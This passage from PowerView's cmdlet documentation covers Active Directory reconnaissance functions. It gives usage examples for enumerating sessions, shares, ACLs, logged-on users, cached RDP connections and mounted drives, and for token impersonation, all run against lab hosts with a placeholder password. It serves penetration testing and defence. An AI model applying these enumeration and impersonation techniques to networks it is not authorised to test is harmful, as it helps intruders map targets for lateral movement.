76 | Parameter Sets: (All)
77 | Aliases:
78 |
79 | Required: False
80 | Position: Named
81 | Default value: [Management.Automation.PSCredential]::Empty
82 | Accept pipeline input: False
83 | Accept wildcard characters: False
84 | ```
85 |
86 | ## INPUTS
87 |
88 | ## OUTPUTS
89 |
90 | ### PowerView.LoggedOnUserInfo
91 |
92 | A PSCustomObject representing a WKSTA_USER_INFO_1 structure, including
93 | the UserName/LogonDomain/AuthDomains/LogonServer for each user, with the ComputerName added.
94 |
95 | ## NOTES
96 |
97 | ## RELATED LINKS
98 |
99 | [http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/)
100 |
101 |
--------------------------------------------------------------------------------
/docs/Recon/Get-NetSession.md:
--------------------------------------------------------------------------------
1 | # Get-NetSession
2 |
3 | ## SYNOPSIS
4 | Returns session information for the local (or a remote) machine.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-NetSession [[-ComputerName] ] [-Credential ]
14 | ```
15 |
16 | ## DESCRIPTION
17 | This function will execute the NetSessionEnum Win32API call to query
18 | a given host for active sessions.
19 |
20 | ## EXAMPLES
21 |
22 | ### -------------------------- EXAMPLE 1 --------------------------
23 | ```
24 | Get-NetSession
25 | ```
26 |
27 | Returns active sessions on the local host.
28 |
29 | ### -------------------------- EXAMPLE 2 --------------------------
30 | ```
31 | Get-NetSession -ComputerName sqlserver
32 | ```
33 |
34 | Returns active sessions on the 'sqlserver' host.
35 |
36 | ### -------------------------- EXAMPLE 3 --------------------------
37 | ```
38 | Get-DomainController | Get-NetSession
39 | ```
40 |
41 | Returns active sessions on all domain controllers.
42 |
43 | ### -------------------------- EXAMPLE 4 --------------------------
44 | ```
45 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
46 | ```
47 |
48 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
49 | Get-NetSession -ComputerName sqlserver -Credential $Cred
50 |
51 | ## PARAMETERS
52 |
53 | ### -ComputerName
54 | Specifies the hostname to query for sessions (also accepts IP addresses).
55 | Defaults to 'localhost'.
56 |
57 | ```yaml
58 | Type: String[]
59 | Parameter Sets: (All)
60 | Aliases: HostName, dnshostname, name
61 |
62 | Required: False
63 | Position: 1
64 | Default value: Localhost
65 | Accept pipeline input: True (ByPropertyName, ByValue)
66 | Accept wildcard characters: False
67 | ```
68 |
69 | ### -Credential
70 | A \[Management.Automation.PSCredential\] object of alternate credentials
71 | for connection to the remote system using Invoke-UserImpersonation.
72 |
73 | ```yaml
74 | Type: PSCredential
75 | Parameter Sets: (All)
76 | Aliases:
77 |
78 | Required: False
79 | Position: Named
80 | Default value: [Management.Automation.PSCredential]::Empty
81 | Accept pipeline input: False
82 | Accept wildcard characters: False
83 | ```
84 |
85 | ## INPUTS
86 |
87 | ## OUTPUTS
88 |
89 | ### PowerView.SessionInfo
90 |
91 | A PSCustomObject representing a WKSTA_USER_INFO_1 structure, including
92 | the CName/UserName/Time/IdleTime for each session, with the ComputerName added.
93 |
94 | ## NOTES
95 |
96 | ## RELATED LINKS
97 |
98 | [http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/)
99 |
100 |
--------------------------------------------------------------------------------
/docs/Recon/Get-NetShare.md:
--------------------------------------------------------------------------------
1 | # Get-NetShare
2 |
3 | ## SYNOPSIS
4 | Returns open shares on the local (or a remote) machine.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-NetShare [[-ComputerName] ] [-Credential ]
14 | ```
15 |
16 | ## DESCRIPTION
17 | This function will execute the NetShareEnum Win32API call to query
18 | a given host for open shares.
19 | This is a replacement for "net share \\\\hostname".
20 |
21 | ## EXAMPLES
22 |
23 | ### -------------------------- EXAMPLE 1 --------------------------
24 | ```
25 | Get-NetShare
26 | ```
27 |
28 | Returns active shares on the local host.
29 |
30 | ### -------------------------- EXAMPLE 2 --------------------------
31 | ```
32 | Get-NetShare -ComputerName sqlserver
33 | ```
34 |
35 | Returns active shares on the 'sqlserver' host
36 |
37 | ### -------------------------- EXAMPLE 3 --------------------------
38 | ```
39 | Get-DomainComputer | Get-NetShare
40 | ```
41 |
42 | Returns all shares for all computers in the domain.
43 |
44 | ### -------------------------- EXAMPLE 4 --------------------------
45 | ```
46 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
47 | ```
48 |
49 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
50 | Get-NetShare -ComputerName sqlserver -Credential $Cred
51 |
52 | ## PARAMETERS
53 |
54 | ### -ComputerName
55 | Specifies the hostname to query for shares (also accepts IP addresses).
56 | Defaults to 'localhost'.
57 |
58 | ```yaml
59 | Type: String[]
60 | Parameter Sets: (All)
61 | Aliases: HostName, dnshostname, name
62 |
63 | Required: False
64 | Position: 1
65 | Default value: Localhost
66 | Accept pipeline input: True (ByPropertyName, ByValue)
67 | Accept wildcard characters: False
68 | ```
69 |
70 | ### -Credential
71 | A \[Management.Automation.PSCredential\] object of alternate credentials
72 | for connection to the remote system using Invoke-UserImpersonation.
73 |
74 | ```yaml
75 | Type: PSCredential
76 | Parameter Sets: (All)
77 | Aliases:
78 |
79 | Required: False
80 | Position: Named
81 | Default value: [Management.Automation.PSCredential]::Empty
82 | Accept pipeline input: False
83 | Accept wildcard characters: False
84 | ```
85 |
86 | ## INPUTS
87 |
88 | ## OUTPUTS
89 |
90 | ### PowerView.ShareInfo
91 |
92 | A PSCustomObject representing a SHARE_INFO_1 structure, including
93 | the name/type/remark for each share, with the ComputerName added.
94 |
95 | ## NOTES
96 |
97 | ## RELATED LINKS
98 |
99 | [http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/](http://www.powershellmagazine.com/2014/09/25/easily-defining-enums-structs-and-win32-functions-in-memory/)
100 |
101 |
--------------------------------------------------------------------------------
/docs/Recon/Get-PathAcl.md:
--------------------------------------------------------------------------------
1 | # Get-PathAcl
2 |
3 | ## SYNOPSIS
4 | Enumerates the ACL for a given file path.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: Add-RemoteConnection, Remove-RemoteConnection, ConvertFrom-SID
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-PathAcl [-Path] [[-Credential] ]
14 | ```
15 |
16 | ## DESCRIPTION
17 | Enumerates the ACL for a specified file/folder path, and translates
18 | the access rules for each entry into readable formats.
19 | If -Credential is passed,
20 | Add-RemoteConnection/Remove-RemoteConnection is used to temporarily map the remote share.
21 |
22 | ## EXAMPLES
23 |
24 | ### -------------------------- EXAMPLE 1 --------------------------
25 | ```
26 | Get-PathAcl "\\SERVER\Share\"
27 | ```
28 |
29 | Returns ACLs for the given UNC share.
30 |
31 | ### -------------------------- EXAMPLE 2 --------------------------
32 | ```
33 | gci .\test.txt | Get-PathAcl
34 | ```
35 |
36 | ### -------------------------- EXAMPLE 3 --------------------------
37 | ```
38 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
39 | ```
40 |
41 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword)
42 | Get-PathAcl -Path "\\\\SERVER\Share\" -Credential $Cred
43 |
44 | ## PARAMETERS
45 |
46 | ### -Path
47 | Specifies the local or remote path to enumerate the ACLs for.
48 |
49 | ```yaml
50 | Type: String[]
51 | Parameter Sets: (All)
52 | Aliases: FullName
53 |
54 | Required: True
55 | Position: 1
56 | Default value: None
57 | Accept pipeline input: True (ByPropertyName, ByValue)
58 | Accept wildcard characters: False
59 | ```
60 |
61 | ### -Credential
62 | A \[Management.Automation.PSCredential\] object of alternate credentials
63 | for connection to the target path.
64 |
65 | ```yaml
66 | Type: PSCredential
67 | Parameter Sets: (All)
68 | Aliases:
69 |
70 | Required: False
71 | Position: 2
72 | Default value: [Management.Automation.PSCredential]::Empty
73 | Accept pipeline input: False
74 | Accept wildcard characters: False
75 | ```
76 |
77 | ## INPUTS
78 |
79 | ### String
80 |
81 | One of more paths to enumerate ACLs for.
82 |
83 | ## OUTPUTS
84 |
85 | ### PowerView.FileACL
86 |
87 | A custom object with the full path and associated ACL entries.
88 |
89 | ## NOTES
90 |
91 | ## RELATED LINKS
92 |
93 | [https://support.microsoft.com/en-us/kb/305144](https://support.microsoft.com/en-us/kb/305144)
94 |
95 |
--------------------------------------------------------------------------------
/docs/Recon/Get-RegLoggedOn.md:
--------------------------------------------------------------------------------
1 | # Get-RegLoggedOn
2 |
3 | ## SYNOPSIS
4 | Returns who is logged onto the local (or a remote) machine
5 | through enumeration of remote registry keys.
6 |
7 | Note: This function requires only domain user rights on the
8 | machine you're enumerating, but remote registry must be enabled.
9 |
10 | Author: Matt Kelly (@BreakersAll)
11 | License: BSD 3-Clause
12 | Required Dependencies: Invoke-UserImpersonation, Invoke-RevertToSelf, ConvertFrom-SID
13 |
14 | ## SYNTAX
15 |
16 | ```
17 | Get-RegLoggedOn [[-ComputerName] ]
18 | ```
19 |
20 | ## DESCRIPTION
21 | This function will query the HKU registry values to retrieve the local
22 | logged on users SID and then attempt and reverse it.
23 | Adapted technique from Sysinternal's PSLoggedOn script.
24 | Benefit over
25 | using the NetWkstaUserEnum API (Get-NetLoggedon) of less user privileges
26 | required (NetWkstaUserEnum requires remote admin access).
27 |
28 | ## EXAMPLES
29 |
30 | ### -------------------------- EXAMPLE 1 --------------------------
31 | ```
32 | Get-RegLoggedOn
33 | ```
34 |
35 | Returns users actively logged onto the local host.
36 |
37 | ### -------------------------- EXAMPLE 2 --------------------------
38 | ```
39 | Get-RegLoggedOn -ComputerName sqlserver
40 | ```
41 |
42 | Returns users actively logged onto the 'sqlserver' host.
43 |
44 | ### -------------------------- EXAMPLE 3 --------------------------
45 | ```
46 | Get-DomainController | Get-RegLoggedOn
47 | ```
48 |
49 | Returns users actively logged on all domain controllers.
50 |
51 | ### -------------------------- EXAMPLE 4 --------------------------
52 | ```
53 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
54 | ```
55 |
56 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
57 | Get-RegLoggedOn -ComputerName sqlserver -Credential $Cred
58 |
59 | ## PARAMETERS
60 |
61 | ### -ComputerName
62 | Specifies the hostname to query for remote registry values (also accepts IP addresses).
63 | Defaults to 'localhost'.
64 |
65 | ```yaml
66 | Type: String[]
67 | Parameter Sets: (All)
68 | Aliases: HostName, dnshostname, name
69 |
70 | Required: False
71 | Position: 1
72 | Default value: Localhost
73 | Accept pipeline input: True (ByPropertyName, ByValue)
74 | Accept wildcard characters: False
75 | ```
76 |
77 | ## INPUTS
78 |
79 | ## OUTPUTS
80 |
81 | ### PowerView.RegLoggedOnUser
82 |
83 | A PSCustomObject including the UserDomain/UserName/UserSID of each
84 | actively logged on user, with the ComputerName added.
85 |
86 | ## NOTES
87 |
88 | ## RELATED LINKS
89 |
90 |
--------------------------------------------------------------------------------
/docs/Recon/Get-WMIProcess.md:
--------------------------------------------------------------------------------
1 | # Get-WMIProcess
2 |
3 | ## SYNOPSIS
4 | Returns a list of processes and their owners on the local or remote machine.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: None
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-WMIProcess [[-ComputerName] ] [-Credential ]
14 | ```
15 |
16 | ## DESCRIPTION
17 | Uses Get-WMIObject to enumerate all Win32_process instances on the local or remote machine,
18 | including the owners of the particular process.
19 |
20 | ## EXAMPLES
21 |
22 | ### -------------------------- EXAMPLE 1 --------------------------
23 | ```
24 | Get-WMIProcess -ComputerName WINDOWS1
25 | ```
26 |
27 | ### -------------------------- EXAMPLE 2 --------------------------
28 | ```
29 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
30 | ```
31 |
32 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
33 | Get-WMIProcess -ComputerName PRIMARY.testlab.local -Credential $Cred
34 |
35 | ## PARAMETERS
36 |
37 | ### -ComputerName
38 | Specifies the hostname to query for cached RDP connections (also accepts IP addresses).
39 | Defaults to 'localhost'.
40 |
41 | ```yaml
42 | Type: String[]
43 | Parameter Sets: (All)
44 | Aliases: HostName, dnshostname, name
45 |
46 | Required: False
47 | Position: 1
48 | Default value: Localhost
49 | Accept pipeline input: True (ByPropertyName, ByValue)
50 | Accept wildcard characters: False
51 | ```
52 |
53 | ### -Credential
54 | A \[Management.Automation.PSCredential\] object of alternate credentials
55 | for connection to the remote system.
56 |
57 | ```yaml
58 | Type: PSCredential
59 | Parameter Sets: (All)
60 | Aliases:
61 |
62 | Required: False
63 | Position: Named
64 | Default value: [Management.Automation.PSCredential]::Empty
65 | Accept pipeline input: False
66 | Accept wildcard characters: False
67 | ```
68 |
69 | ## INPUTS
70 |
71 | ## OUTPUTS
72 |
73 | ### PowerView.UserProcess
74 |
75 | A PSCustomObject containing the remote process information.
76 |
77 | ## NOTES
78 |
79 | ## RELATED LINKS
80 |
81 |
--------------------------------------------------------------------------------
/docs/Recon/Get-WMIRegCachedRDPConnection.md:
--------------------------------------------------------------------------------
1 | # Get-WMIRegCachedRDPConnection
2 |
3 | ## SYNOPSIS
4 | Returns information about RDP connections outgoing from the local (or remote) machine.
5 |
6 | Note: This function requires administrative rights on the machine you're enumerating.
7 |
8 | Author: Will Schroeder (@harmj0y)
9 | License: BSD 3-Clause
10 | Required Dependencies: ConvertFrom-SID
11 |
12 | ## SYNTAX
13 |
14 | ```
15 | Get-WMIRegCachedRDPConnection [[-ComputerName] ] [-Credential ]
16 | ```
17 |
18 | ## DESCRIPTION
19 | Uses remote registry functionality to query all entries for the
20 | "Windows Remote Desktop Connection Client" on a machine, separated by
21 | user and target server.
22 |
23 | ## EXAMPLES
24 |
25 | ### -------------------------- EXAMPLE 1 --------------------------
26 | ```
27 | Get-WMIRegCachedRDPConnection
28 | ```
29 |
30 | Returns the RDP connection client information for the local machine.
31 |
32 | ### -------------------------- EXAMPLE 2 --------------------------
33 | ```
34 | Get-WMIRegCachedRDPConnection -ComputerName WINDOWS2.testlab.local
35 | ```
36 |
37 | Returns the RDP connection client information for the WINDOWS2.testlab.local machine
38 |
39 | ### -------------------------- EXAMPLE 3 --------------------------
40 | ```
41 | Get-DomainComputer | Get-WMIRegCachedRDPConnection
42 | ```
43 |
44 | Returns cached RDP information for all machines in the domain.
45 |
46 | ### -------------------------- EXAMPLE 4 --------------------------
47 | ```
48 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
49 | ```
50 |
51 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
52 | Get-WMIRegCachedRDPConnection -ComputerName PRIMARY.testlab.local -Credential $Cred
53 |
54 | ## PARAMETERS
55 |
56 | ### -ComputerName
57 | Specifies the hostname to query for cached RDP connections (also accepts IP addresses).
58 | Defaults to 'localhost'.
59 |
60 | ```yaml
61 | Type: String[]
62 | Parameter Sets: (All)
63 | Aliases: HostName, dnshostname, name
64 |
65 | Required: False
66 | Position: 1
67 | Default value: Localhost
68 | Accept pipeline input: True (ByPropertyName, ByValue)
69 | Accept wildcard characters: False
70 | ```
71 |
72 | ### -Credential
73 | A \[Management.Automation.PSCredential\] object of alternate credentials
74 | for connecting to the remote system.
75 |
76 | ```yaml
77 | Type: PSCredential
78 | Parameter Sets: (All)
79 | Aliases:
80 |
81 | Required: False
82 | Position: Named
83 | Default value: [Management.Automation.PSCredential]::Empty
84 | Accept pipeline input: False
85 | Accept wildcard characters: False
86 | ```
87 |
88 | ## INPUTS
89 |
90 | ## OUTPUTS
91 |
92 | ### PowerView.CachedRDPConnection
93 |
94 | A PSCustomObject containing the ComputerName and cached RDP information.
95 |
96 | ## NOTES
97 |
98 | ## RELATED LINKS
99 |
100 |
--------------------------------------------------------------------------------
/docs/Recon/Get-WMIRegLastLoggedOn.md:
--------------------------------------------------------------------------------
1 | # Get-WMIRegLastLoggedOn
2 |
3 | ## SYNOPSIS
4 | Returns the last user who logged onto the local (or a remote) machine.
5 |
6 | Note: This function requires administrative rights on the machine you're enumerating.
7 |
8 | Author: Will Schroeder (@harmj0y)
9 | License: BSD 3-Clause
10 | Required Dependencies: None
11 |
12 | ## SYNTAX
13 |
14 | ```
15 | Get-WMIRegLastLoggedOn [[-ComputerName] ] [-Credential ]
16 | ```
17 |
18 | ## DESCRIPTION
19 | This function uses remote registry to enumerate the LastLoggedOnUser registry key
20 | for the local (or remote) machine.
21 |
22 | ## EXAMPLES
23 |
24 | ### -------------------------- EXAMPLE 1 --------------------------
25 | ```
26 | Get-WMIRegLastLoggedOn
27 | ```
28 |
29 | Returns the last user logged onto the local machine.
30 |
31 | ### -------------------------- EXAMPLE 2 --------------------------
32 | ```
33 | Get-WMIRegLastLoggedOn -ComputerName WINDOWS1
34 | ```
35 |
36 | Returns the last user logged onto WINDOWS1
37 |
38 | ### -------------------------- EXAMPLE 3 --------------------------
39 | ```
40 | Get-DomainComputer | Get-WMIRegLastLoggedOn
41 | ```
42 |
43 | Returns the last user logged onto all machines in the domain.
44 |
45 | ### -------------------------- EXAMPLE 4 --------------------------
46 | ```
47 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
48 | ```
49 |
50 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
51 | Get-WMIRegLastLoggedOn -ComputerName PRIMARY.testlab.local -Credential $Cred
52 |
53 | ## PARAMETERS
54 |
55 | ### -ComputerName
56 | Specifies the hostname to query for remote registry values (also accepts IP addresses).
57 | Defaults to 'localhost'.
58 |
59 | ```yaml
60 | Type: String[]
61 | Parameter Sets: (All)
62 | Aliases: HostName, dnshostname, name
63 |
64 | Required: False
65 | Position: 1
66 | Default value: Localhost
67 | Accept pipeline input: True (ByPropertyName, ByValue)
68 | Accept wildcard characters: False
69 | ```
70 |
71 | ### -Credential
72 | A \[Management.Automation.PSCredential\] object of alternate credentials
73 | for connecting to the remote system.
74 |
75 | ```yaml
76 | Type: PSCredential
77 | Parameter Sets: (All)
78 | Aliases:
79 |
80 | Required: False
81 | Position: Named
82 | Default value: [Management.Automation.PSCredential]::Empty
83 | Accept pipeline input: False
84 | Accept wildcard characters: False
85 | ```
86 |
87 | ## INPUTS
88 |
89 | ## OUTPUTS
90 |
91 | ### PowerView.LastLoggedOnUser
92 |
93 | A PSCustomObject containing the ComputerName and last loggedon user.
94 |
95 | ## NOTES
96 |
97 | ## RELATED LINKS
98 |
99 |
--------------------------------------------------------------------------------
/docs/Recon/Get-WMIRegMountedDrive.md:
--------------------------------------------------------------------------------
1 | # Get-WMIRegMountedDrive
2 |
3 | ## SYNOPSIS
4 | Returns information about saved network mounted drives for the local (or remote) machine.
5 |
6 | Note: This function requires administrative rights on the machine you're enumerating.
7 |
8 | Author: Will Schroeder (@harmj0y)
9 | License: BSD 3-Clause
10 | Required Dependencies: ConvertFrom-SID
11 |
12 | ## SYNTAX
13 |
14 | ```
15 | Get-WMIRegMountedDrive [[-ComputerName] ] [-Credential ]
16 | ```
17 |
18 | ## DESCRIPTION
19 | Uses remote registry functionality to enumerate recently mounted network drives.
20 |
21 | ## EXAMPLES
22 |
23 | ### -------------------------- EXAMPLE 1 --------------------------
24 | ```
25 | Get-WMIRegMountedDrive
26 | ```
27 |
28 | Returns the saved network mounted drives for the local machine.
29 |
30 | ### -------------------------- EXAMPLE 2 --------------------------
31 | ```
32 | Get-WMIRegMountedDrive -ComputerName WINDOWS2.testlab.local
33 | ```
34 |
35 | Returns the saved network mounted drives for the WINDOWS2.testlab.local machine
36 |
37 | ### -------------------------- EXAMPLE 3 --------------------------
38 | ```
39 | Get-DomainComputer | Get-WMIRegMountedDrive
40 | ```
41 |
42 | Returns the saved network mounted drives for all machines in the domain.
43 |
44 | ### -------------------------- EXAMPLE 4 --------------------------
45 | ```
46 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
47 | ```
48 |
49 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
50 | Get-WMIRegMountedDrive -ComputerName PRIMARY.testlab.local -Credential $Cred
51 |
52 | ## PARAMETERS
53 |
54 | ### -ComputerName
55 | Specifies the hostname to query for mounted drive information (also accepts IP addresses).
56 | Defaults to 'localhost'.
57 |
58 | ```yaml
59 | Type: String[]
60 | Parameter Sets: (All)
61 | Aliases: HostName, dnshostname, name
62 |
63 | Required: False
64 | Position: 1
65 | Default value: Localhost
66 | Accept pipeline input: True (ByPropertyName, ByValue)
67 | Accept wildcard characters: False
68 | ```
69 |
70 | ### -Credential
71 | A \[Management.Automation.PSCredential\] object of alternate credentials
72 | for connecting to the remote system.
73 |
74 | ```yaml
75 | Type: PSCredential
76 | Parameter Sets: (All)
77 | Aliases:
78 |
79 | Required: False
80 | Position: Named
81 | Default value: [Management.Automation.PSCredential]::Empty
82 | Accept pipeline input: False
83 | Accept wildcard characters: False
84 | ```
85 |
86 | ## INPUTS
87 |
88 | ## OUTPUTS
89 |
90 | ### PowerView.RegMountedDrive
91 |
92 | A PSCustomObject containing the ComputerName and mounted drive information.
93 |
94 | ## NOTES
95 |
96 | ## RELATED LINKS
97 |
98 |
--------------------------------------------------------------------------------
/docs/Recon/Get-WMIRegProxy.md:
--------------------------------------------------------------------------------
1 | # Get-WMIRegProxy
2 |
3 | ## SYNOPSIS
4 | Enumerates the proxy server and WPAD conents for the current user.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: None
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Get-WMIRegProxy [[-ComputerName] ] [-Credential ]
14 | ```
15 |
16 | ## DESCRIPTION
17 | Enumerates the proxy server and WPAD specification for the current user
18 | on the local machine (default), or a machine specified with -ComputerName.
19 | It does this by enumerating settings from
20 | HKU:SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings.
21 |
22 | ## EXAMPLES
23 |
24 | ### -------------------------- EXAMPLE 1 --------------------------
25 | ```
26 | Get-WMIRegProxy
27 | ```
28 |
29 | ComputerName ProxyServer AutoConfigURL Wpad
30 | ------------ ----------- ------------- ----
31 | WINDOWS1 http://primary.test...
32 |
33 | ### -------------------------- EXAMPLE 2 --------------------------
34 | ```
35 | $Cred = Get-Credential "TESTLAB\administrator"
36 | ```
37 |
38 | Get-WMIRegProxy -Credential $Cred -ComputerName primary.testlab.local
39 |
40 | ComputerName ProxyServer AutoConfigURL Wpad
41 | ------------ ----------- ------------- ----
42 | windows1.testlab.local primary.testlab.local
43 |
44 | ## PARAMETERS
45 |
46 | ### -ComputerName
47 | Specifies the system to enumerate proxy settings on.
48 | Defaults to the local host.
49 |
50 | ```yaml
51 | Type: String[]
52 | Parameter Sets: (All)
53 | Aliases: HostName, dnshostname, name
54 |
55 | Required: False
56 | Position: 1
57 | Default value: $Env:COMPUTERNAME
58 | Accept pipeline input: True (ByPropertyName, ByValue)
59 | Accept wildcard characters: False
60 | ```
61 |
62 | ### -Credential
63 | A \[Management.Automation.PSCredential\] object of alternate credentials
64 | for connecting to the remote system.
65 |
66 | ```yaml
67 | Type: PSCredential
68 | Parameter Sets: (All)
69 | Aliases:
70 |
71 | Required: False
72 | Position: Named
73 | Default value: [Management.Automation.PSCredential]::Empty
74 | Accept pipeline input: False
75 | Accept wildcard characters: False
76 | ```
77 |
78 | ## INPUTS
79 |
80 | ### String
81 |
82 | Accepts one or more computer name specification strings on the pipeline (netbios or FQDN).
83 |
84 | ## OUTPUTS
85 |
86 | ### PowerView.ProxySettings
87 |
88 | Outputs custom PSObjects with the ComputerName, ProxyServer, AutoConfigURL, and WPAD contents.
89 |
90 | ## NOTES
91 |
92 | ## RELATED LINKS
93 |
94 |
--------------------------------------------------------------------------------
/docs/Recon/Invoke-RevertToSelf.md:
--------------------------------------------------------------------------------
1 | # Invoke-RevertToSelf
2 |
3 | ## SYNOPSIS
4 | Reverts any token impersonation.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: PSReflect
9 |
10 | ## SYNTAX
11 |
12 | ```
13 | Invoke-RevertToSelf [[-TokenHandle] ]
14 | ```
15 |
16 | ## DESCRIPTION
17 | This function uses RevertToSelf() to revert any impersonated tokens.
18 | If -TokenHandle is passed (the token handle returned by Invoke-UserImpersonation),
19 | CloseHandle() is used to close the opened handle.
20 |
21 | ## EXAMPLES
22 |
23 | ### -------------------------- EXAMPLE 1 --------------------------
24 | ```
25 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
26 | ```
27 |
28 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
29 | $Token = Invoke-UserImpersonation -Credential $Cred
30 | Invoke-RevertToSelf -TokenHandle $Token
31 |
32 | ## PARAMETERS
33 |
34 | ### -TokenHandle
35 | An optional IntPtr TokenHandle returned by Invoke-UserImpersonation.
36 |
37 | ```yaml
38 | Type: IntPtr
39 | Parameter Sets: (All)
40 | Aliases:
41 |
42 | Required: False
43 | Position: 1
44 | Default value: None
45 | Accept pipeline input: False
46 | Accept wildcard characters: False
47 | ```
48 |
49 | ## INPUTS
50 |
51 | ## OUTPUTS
52 |
53 | ## NOTES
54 |
55 | ## RELATED LINKS
56 |
57 |
--------------------------------------------------------------------------------
/docs/Recon/Invoke-UserImpersonation.md:
--------------------------------------------------------------------------------
1 | # Invoke-UserImpersonation
2 |
3 | ## SYNOPSIS
4 | Creates a new "runas /netonly" type logon and impersonates the token.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: PSReflect
9 |
10 | ## SYNTAX
11 |
12 | ### Credential (Default)
13 | ```
14 | Invoke-UserImpersonation -Credential [-Quiet]
15 | ```
16 |
17 | ### TokenHandle
18 | ```
19 | Invoke-UserImpersonation -TokenHandle [-Quiet]
20 | ```
21 |
22 | ## DESCRIPTION
23 | This function uses LogonUser() with the LOGON32_LOGON_NEW_CREDENTIALS LogonType
24 | to simulate "runas /netonly".
25 | The resulting token is then impersonated with
26 | ImpersonateLoggedOnUser() and the token handle is returned for later usage
27 | with Invoke-RevertToSelf.
28 |
29 | ## EXAMPLES
30 |
31 | ### -------------------------- EXAMPLE 1 --------------------------
32 | ```
33 | $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
34 | ```
35 |
36 | $Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
37 | Invoke-UserImpersonation -Credential $Cred
38 |
39 | ## PARAMETERS
40 |
41 | ### -Credential
42 | A \[Management.Automation.PSCredential\] object with alternate credentials
43 | to impersonate in the current thread space.
44 |
45 | ```yaml
46 | Type: PSCredential
47 | Parameter Sets: Credential
48 | Aliases:
49 |
50 | Required: True
51 | Position: Named
52 | Default value: None
53 | Accept pipeline input: False
54 | Accept wildcard characters: False
55 | ```
56 |
57 | ### -TokenHandle
58 | An IntPtr TokenHandle returned by a previous Invoke-UserImpersonation.
59 | If this is supplied, LogonUser() is skipped and only ImpersonateLoggedOnUser()
60 | is executed.
61 |
62 | ```yaml
63 | Type: IntPtr
64 | Parameter Sets: TokenHandle
65 | Aliases:
66 |
67 | Required: True
68 | Position: Named
69 | Default value: None
70 | Accept pipeline input: False
71 | Accept wildcard characters: False
72 | ```
73 |
74 | ### -Quiet
75 | Suppress any warnings about STA vs MTA.
76 |
77 | ```yaml
78 | Type: SwitchParameter
79 | Parameter Sets: (All)
80 | Aliases:
81 |
82 | Required: False
83 | Position: Named
84 | Default value: False
85 | Accept pipeline input: False
86 | Accept wildcard characters: False
87 | ```
88 |
89 | ## INPUTS
90 |
91 | ## OUTPUTS
92 |
93 | ### IntPtr
94 |
95 | The TokenHandle result from LogonUser.
96 |
97 | ## NOTES
98 |
99 | ## RELATED LINKS
100 |
101 |
--------------------------------------------------------------------------------
/docs/Recon/Remove-RemoteConnection.md:
--------------------------------------------------------------------------------
1 | # Remove-RemoteConnection
2 |
3 | ## SYNOPSIS
4 | Destroys a connection created by New-RemoteConnection.
5 |
6 | Author: Will Schroeder (@harmj0y)
7 | License: BSD 3-Clause
8 | Required Dependencies: PSReflect
9 |
10 | ## SYNTAX
11 |
12 | ### ComputerName (Default)
13 | ```
14 | Remove-RemoteConnection [-ComputerName]
15 | ```
16 |
17 | ### Path
18 | ```
19 | Remove-RemoteConnection [-Path]
20 | ```
21 |
22 | ## DESCRIPTION
23 | This function uses WNetCancelConnection2 to destroy a connection created by
24 | New-RemoteConnection.
25 | If a -Path isn't specified, a -ComputerName is required to
26 | 'unmount' \\\\$ComputerName\IPC$.
27 |
28 | ## EXAMPLES
29 |
30 | ### -------------------------- EXAMPLE 1 --------------------------
31 | ```
32 | Remove-RemoteConnection -ComputerName 'PRIMARY.testlab.local'
33 | ```
34 |
35 | ### -------------------------- EXAMPLE 2 --------------------------
36 | ```
37 | Remove-RemoteConnection -Path '\\PRIMARY.testlab.local\C$\'
38 | ```
39 |
40 | ### -------------------------- EXAMPLE 3 --------------------------
41 | ```
